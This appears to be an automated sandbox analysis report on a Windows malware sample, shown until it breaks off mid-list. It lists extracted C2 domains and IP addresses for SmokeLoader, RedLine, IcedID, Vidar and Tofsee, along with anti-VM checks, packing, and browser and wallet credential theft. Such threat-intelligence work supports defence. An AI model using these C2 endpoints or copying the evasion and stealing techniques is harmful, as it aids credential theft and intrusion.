arkei | 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531

Resubmissions

03-11-2021 17:22

211103-vxn26secg6 10

03-11-2021 17:13

211103-vrml6abdhr 10

Analysis

max time kernel
18002s
max time network
17997s
platform
windows7_x64
resource
win7-en-20210920
submitted
03-11-2021 17:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
Size

292KB
MD5

d2fff856a1371f8b3602a2247ab26d46
SHA1

c2acff6cdf47ee82fe35637780e163e46ab5c4d7
SHA256

1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531
SHA512

6579f2e625ca19be10fcea9f68427c9887f21af26752d775b2987dace469759a8588b56a08a533fc4ba5055df4918c87ee1539146e58dc20c5c7280bef6d1d92

Malware Config

Extracted

Family

smokeloader

Version

2020

http://honawey70.top/

http://wijibui00.top/

http://nusurtal4f.net/

http://netomishnetojuk.net/

http://escalivrouter.net/

http://nick22doom4.net/

http://wrioshtivsio.su/

http://nusotiso4.su/

http://rickkhtovkka.biz/

http://palisotoliso.net/

rc4.i32

Extracted

Family

tofsee

quadoil.ru

lakeflex.ru

Extracted

Family

redline

Botnet

SuperStar

185.215.113.29:36224

Extracted

Family

icedid

Campaign

3022016856

actuallyobligat.info

Extracted

Family

redline

Botnet

LOVE

91.242.229.222:21475

Extracted

Family

redline

Botnet

101

185.92.73.142:52097

Extracted

Family

redline

Botnet

z0rm1on

45.153.186.153:56675

Extracted

Family

vidar

Version

47.8

Botnet

706

https://mas.to/@romashkin

Attributes

profile_id
706

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei
IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 8 IoCs

Processes:

resource	yara_rule
behavioral1/memory/720-106-0x0000000000800000-0x000000000081C000-memory.dmp	family_redline
behavioral1/memory/720-114-0x0000000001ED0000-0x0000000001EEB000-memory.dmp	family_redline
behavioral1/memory/1212-133-0x00000000023B0000-0x00000000023EE000-memory.dmp	family_redline
behavioral1/memory/1212-134-0x0000000002550000-0x000000000258D000-memory.dmp	family_redline
behavioral1/memory/1232-143-0x0000000002120000-0x0000000002150000-memory.dmp	family_redline
behavioral1/memory/1232-144-0x00000000007F0000-0x000000000080B000-memory.dmp	family_redline
behavioral1/memory/1708-229-0x0000000001DE0000-0x0000000001E0E000-memory.dmp	family_redline
behavioral1/memory/1708-231-0x0000000001E10000-0x0000000001E3C000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Arkei Stealer Payload 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/1180-147-0x0000000000220000-0x0000000000241000-memory.dmp	family_arkei
behavioral1/memory/1180-148-0x0000000000400000-0x00000000008F0000-memory.dmp	family_arkei

Core1 .NET packer 1 IoCs

Detects packer/loader used by .NET malware.

Processes:

resource	yara_rule
behavioral1/memory/1232-143-0x0000000002120000-0x0000000002150000-memory.dmp	Core1

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/1308-250-0x0000000000960000-0x0000000000A36000-memory.dmp	family_vidar
behavioral1/memory/1308-251-0x0000000000400000-0x0000000000959000-memory.dmp	family_vidar

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

126 1488 powershell.exe
133 1488 powershell.exe
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

flow	pid	process
126	1488	powershell.exe
133	1488	powershell.exe

Executes dropped EXE 64 IoCs

Processes:

CF8F.exeD48F.exeCF8F.exeDE12.exeE18C.exeE812.exezfadmvvq.exeE812.exeFAC9.exe101.exe630.execupd.exesisbkup.exesisbkup.exesisbkup.exeF457.exenDRwKPXQhM.EXeFABE.exe366.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exejjehjsaiuehjsaiuehjsasisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exeiuehjsajjehjsaiuehjsasisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exejjehjsaiuehjsaiuehjsasisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exe5CFC.exe5CFC.exesisbkup.exe

pid	process
812	CF8F.exe
1164	D48F.exe
1056	CF8F.exe
1344	DE12.exe
1628	E18C.exe
1968	E812.exe
1192	zfadmvvq.exe
720	E812.exe
1212	FAC9.exe
1232	101.exe
1180	630.exe
1672	cupd.exe
952	sisbkup.exe
1256	sisbkup.exe
1192	sisbkup.exe
1624	F457.exe
1976	nDRwKPXQhM.EXe
1708	FABE.exe
1308	366.exe
988	sisbkup.exe
1472	sisbkup.exe
1708	sisbkup.exe
1556	sisbkup.exe
1560	sisbkup.exe
1608	sisbkup.exe
1936	jjehjsa
856	iuehjsa
1944	iuehjsa
1588	sisbkup.exe
1732	sisbkup.exe
1740	sisbkup.exe
1696	sisbkup.exe
1992	sisbkup.exe
1148	sisbkup.exe
1292	sisbkup.exe
1444	sisbkup.exe
1792	sisbkup.exe
788	sisbkup.exe
1200	iuehjsa
1216	jjehjsa
572	iuehjsa
1548	sisbkup.exe
1992	sisbkup.exe
1480	sisbkup.exe
364	sisbkup.exe
964	sisbkup.exe
560	sisbkup.exe
2016	sisbkup.exe
1760	sisbkup.exe
1612	sisbkup.exe
1192	sisbkup.exe
1128	jjehjsa
1480	iuehjsa
1952	iuehjsa
748	sisbkup.exe
1276	sisbkup.exe
1584	sisbkup.exe
1400	sisbkup.exe
1548	sisbkup.exe
436	sisbkup.exe
2000	sisbkup.exe
1572	5CFC.exe
1768	5CFC.exe
1740	sisbkup.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Checks BIOS information in registry 2 TTPs 64 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

sisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sisbkup.exe

Deletes itself 1 IoCs

Processes:

pid process

1264

pid	process
1264

Loads dropped DLL 57 IoCs

Processes:

CF8F.exeDE12.exeE812.exeregsvr32.exe630.execmd.exerundll32.exeWerFault.exerundll32.exejjehjsajjehjsajjehjsa5CFC.exejjehjsajjehjsajjehjsajjehjsajjehjsacmd.exemsiexec.exejjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsa

pid	process
812	CF8F.exe
1344	DE12.exe
1968	E812.exe
1684	regsvr32.exe
1264
1180	630.exe
1180	630.exe
1180	630.exe
1180	630.exe
1180	630.exe
1180	630.exe
1180	630.exe
1180	630.exe
596	cmd.exe
560	rundll32.exe
560	rundll32.exe
560	rundll32.exe
324	WerFault.exe
324	WerFault.exe
324	WerFault.exe
324	WerFault.exe
960	rundll32.exe
960	rundll32.exe
960	rundll32.exe
1936	jjehjsa
1216	jjehjsa
1128	jjehjsa
1572	5CFC.exe
1064	jjehjsa
1988	jjehjsa
276	jjehjsa
188	jjehjsa
456	jjehjsa
984	cmd.exe
2232	msiexec.exe
2384	jjehjsa
2040	jjehjsa
2704	jjehjsa
2296	jjehjsa
2664	jjehjsa
2564	jjehjsa
2204	jjehjsa
2896	jjehjsa
2580	jjehjsa
1200	jjehjsa
1540	jjehjsa
2680	jjehjsa
1732	jjehjsa
2728	jjehjsa
2412	jjehjsa
2796	jjehjsa
2532	jjehjsa
1568	jjehjsa
3008	jjehjsa
2180	jjehjsa
1080	jjehjsa
1568	jjehjsa

Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

1640 icacls.exe
1468 icacls.exe
1740 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1640	icacls.exe
1468	icacls.exe
1740	icacls.exe

Themida packer 31 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
\ProgramData\cupd.exe	themida
\ProgramData\cupd.exe	themida
\ProgramData\cupd.exe	themida
C:\ProgramData\cupd.exe	themida
C:\ProgramData\cupd.exe	themida
behavioral1/memory/1672-163-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/1672-164-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/1672-165-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/1672-166-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/1672-167-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/1672-168-0x0000000001040000-0x0000000001656000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe	themida
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe	themida
behavioral1/memory/952-179-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/952-180-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/952-181-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/952-182-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/952-183-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/952-184-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/1256-185-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/1256-187-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/1256-188-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/1256-189-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/1256-190-0x0000000001040000-0x0000000001656000-memory.dmp	themida
behavioral1/memory/1256-191-0x0000000001040000-0x0000000001656000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe	themida
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe	themida
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe	themida
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe	themida
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe	themida
behavioral1/memory/1488-547-0x00000000024F0000-0x000000000313A000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 64 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

sisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.execupd.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cupd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sisbkup.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

Processes:

